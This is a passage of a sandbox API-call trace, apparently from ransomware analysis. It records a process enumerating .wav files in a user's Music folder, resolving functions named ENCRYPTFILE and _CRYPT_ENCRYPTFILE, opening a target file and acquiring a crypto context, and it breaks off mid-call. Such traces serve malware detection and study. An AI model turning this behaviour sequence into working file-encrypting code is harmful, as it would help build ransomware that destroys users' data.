ftLastAccessTime.dwLowDateTime=0x1883d600, ftLastAccessTime.dwHighDateTime=0x1d5e189, ftLastWriteTime.dwLowDateTime=0x1883d600, ftLastWriteTime.dwHighDateTime=0x1d5e189, nFileSizeHigh=0x0, nFileSizeLow=0x5975, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="dle rck7Umm-.wav", cAlternateFileName="DLERCK~1.WAV")) returned 0 [0112.396] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0112.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369bb8 | out: hHeap=0x1780000) returned 1 [0112.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0112.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ec0 | out: hHeap=0x1780000) returned 1 [0112.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0112.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431dc08 | out: hHeap=0x1780000) returned 1 [0112.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0112.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0112.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0112.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0112.396] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0112.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0112.396] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0112.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0112.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca028 | out: hHeap=0x1780000) returned 1 [0112.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0112.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0112.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0112.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0112.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0112.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0112.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0112.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19d20a8 | out: hHeap=0x1780000) returned 1 [0112.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0112.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0112.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0112.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0112.397] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0112.397] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0112.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0112.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0112.397] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0112.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0112.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0112.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0112.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2410 [0112.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0112.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0112.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0112.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0112.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0112.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0112.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0112.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0112.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a3a0 [0112.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0112.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0112.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0112.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0112.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x19d20a8 [0112.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a3a0 | out: hHeap=0x1780000) returned 1 [0112.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0112.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0112.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0112.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0112.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca0b8 [0112.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0112.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0112.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0112.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0112.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0112.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0112.398] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0112.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0112.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0112.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0112.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0112.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0112.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0112.398] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0112.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0112.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0112.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0112.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0112.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0112.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0112.399] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\JUnckwz0f9.wav", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1d09060, ftCreationTime.dwHighDateTime=0x1d5e256, ftLastAccessTime.dwLowDateTime=0xfe02eaa0, ftLastAccessTime.dwHighDateTime=0x1d5e18d, ftLastWriteTime.dwLowDateTime=0xfe02eaa0, ftLastWriteTime.dwHighDateTime=0x1d5e18d, nFileSizeHigh=0x0, nFileSizeLow=0x16fbe, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="JUnckwz0f9.wav", cAlternateFileName="JUNCKW~1.WAV")) returned 0x41ac040 [0112.399] FindClose (in: hFindFile=0x41ac040 | out: hFindFile=0x41ac040) returned 1 [0112.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0112.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0112.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0112.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0112.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0112.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0112.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0112.399] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0112.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0112.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0112.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0112.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2510 [0112.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0112.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0112.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0112.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0112.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0112.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ec0 [0112.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0112.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0112.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0112.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0112.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0112.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0112.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0112.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0112.400] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0112.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0112.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0112.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0112.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0112.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0112.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0112.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0112.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0112.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0112.400] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0112.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0112.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0112.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0112.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2340 [0112.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0112.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0112.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0112.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0112.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0112.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2460 [0112.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0112.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0112.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0112.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24c0 [0112.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0112.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0112.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0112.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca418 [0112.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0112.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0112.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0112.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0112.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0112.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0112.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0112.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0112.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0112.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0112.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0112.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0112.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0112.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0112.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0112.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0112.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0112.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0112.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0112.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0112.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0112.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0112.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0112.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0112.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0112.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0112.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0112.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0112.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0112.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0112.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0112.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0112.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0112.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0112.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0112.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0112.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0112.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0112.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0112.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0112.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0112.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0112.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0112.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0112.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0112.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0112.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0112.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0112.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0112.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0112.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0112.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0112.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0112.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0112.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0112.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0112.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0112.403] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0112.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0112.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca988, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0112.404] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\JUnckwz0f9.wav" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\junckwz0f9.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0112.404] FreeLibrary (hLibModule=0x772d0000) returned 1 [0112.404] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0112.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca2b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0112.404] CloseHandle (hObject=0x258) returned 1 [0112.404] FreeLibrary (hLibModule=0x772d0000) returned 1 [0112.404] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0112.405] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\JUnckwz0f9.wav", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1d09060, ftCreationTime.dwHighDateTime=0x1d5e256, ftLastAccessTime.dwLowDateTime=0xfe02eaa0, ftLastAccessTime.dwHighDateTime=0x1d5e18d, ftLastWriteTime.dwLowDateTime=0xfe02eaa0, ftLastWriteTime.dwHighDateTime=0x1d5e18d, nFileSizeHigh=0x0, nFileSizeLow=0x16fbe, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="JUnckwz0f9.wav", cAlternateFileName="JUNCKW~1.WAV")) returned 0x41ac500 [0112.405] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0112.405] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0112.405] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0112.405] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0112.405] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0112.406] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0112.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0112.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0112.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797048, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0112.407] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5250) returned 1 [0112.407] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0112.407] CharUpperBuffW (in: 